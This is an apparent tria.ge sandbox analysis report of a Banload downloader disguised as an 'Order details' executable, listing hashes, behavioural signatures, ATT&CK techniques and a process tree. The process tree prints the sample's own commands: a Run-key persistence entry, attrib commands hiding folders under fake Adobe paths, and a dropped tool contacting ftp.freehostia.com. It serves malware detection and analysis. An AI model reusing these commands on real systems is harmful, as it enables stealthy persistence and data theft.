Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
3s -
max time network
1s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
20/05/2024, 04:40
General
-
Target
Order details 20160623103529.exe
-
Size
2.3MB
-
MD5
07a4eab7815d7240e9d3d38f7df9be36
-
SHA1
2fcb5ee484b60dcadd3ef4aa4ab2f6b22f8e78f4
-
SHA256
14d2a798476194ebc48db82141fa597c7ac6a91094f36a1311d857579c867017
-
SHA512
4fe7adbfcd46ef19d3ce73f4342a197579d6653c7bba96e65813fe6d076cadc87ff2e0d640035656a044566e21e21dcf4393191f4d6330f25319f476611686ab
-
SSDEEP
49152:Ipgs8ABpNAcbBicSTgbDgtcBbWRzfYb/kL+agsNFCriQmew54a11Fp:IGs8AvNzXgtcpEfFFC2QVbalp
Malware Config
Signatures
-
Banload
Banload variants download malicious files, then install and execute the files.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 5 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies registry class 13 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe"C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"4⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s6⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"6⤵
- Adds Run key to start application
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- Gathers network information
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Modifies registry class
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
118B
MD59275864a850bf2c9d21d8b158be4999e
SHA1838ebcbc1a27c9d8dbad268de77877bf892f5223
SHA256ff279561e09b341b77ace01b0d71152e8471e5c8767aedaa16c9096774727511
SHA512ba58a479507bf8e705189e3283ac5a91c11f6ac276efb2e40ee583a1595cbf7c5204c56fab7a46bfae19d7089f25466303f1baafc7d260d86cb48db073786a8d
-
Filesize
124KB
MD51a1075e5e307f3a4b8527110a51ce827
SHA1f453838ed21020b7ca059244feea8579e5aa74ef
SHA256ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1
-
Filesize
556B
MD597410477dc9501dffca4ea4b1ae57273
SHA1fb573b3bf4eba734b0f32db1a5b7ff78de36b064
SHA2563836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c
SHA5123d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915
-
Filesize
186B
MD509082253605a7171f078e26dc308a667
SHA1585286c9fcda5e66e7fdb4e17a7bab6160183d46
SHA256f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed
SHA512adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8
-
Filesize
189B
MD5ce8041824149d8266dbb0ad9688224d7
SHA13ab653c43ce66681ceaab90193e1a4c95d998090
SHA2560a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5
SHA512e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d
-
Filesize
256KB
MD597b8dbcc7b3cc290aef4241df911ac2e
SHA1733ababbcd278821d4e3ee78580841981f26642e
SHA256c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023
SHA5124adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25
-
Filesize
139B
MD589412aba215b6cd18b8a64c4485fa03f
SHA137089346499f54a7d89262a67d95c8764ab3ca1f
SHA2569607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1
SHA5127afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b
-
Filesize
2.1MB
MD53351585db91521d6fa543490ac7cd6a5
SHA19be2b3abf17613d7386f9949cabaedd466902e82
SHA2563f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4
SHA512804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30
-
Filesize
2.1MB
MD575a35514185cd2c5cf5aab50cc380963
SHA1f1ff1e088f910398a48f4f7dfddec24e6d6d1734
SHA2561cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937
SHA512ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297
-
Filesize
1KB
MD5ce7ccd3b48dbe8f34db3b2b1222e4fd9
SHA1e25f9947c2b250c98dffd7bfeaca75b4db17dcfd
SHA2566374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e
SHA512ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.0MB
-
Filesize
2.7MB
-
Filesize
2.0MB
-
Filesize
2.7MB
-
Filesize
2.0MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
8KB
-
Filesize
8KB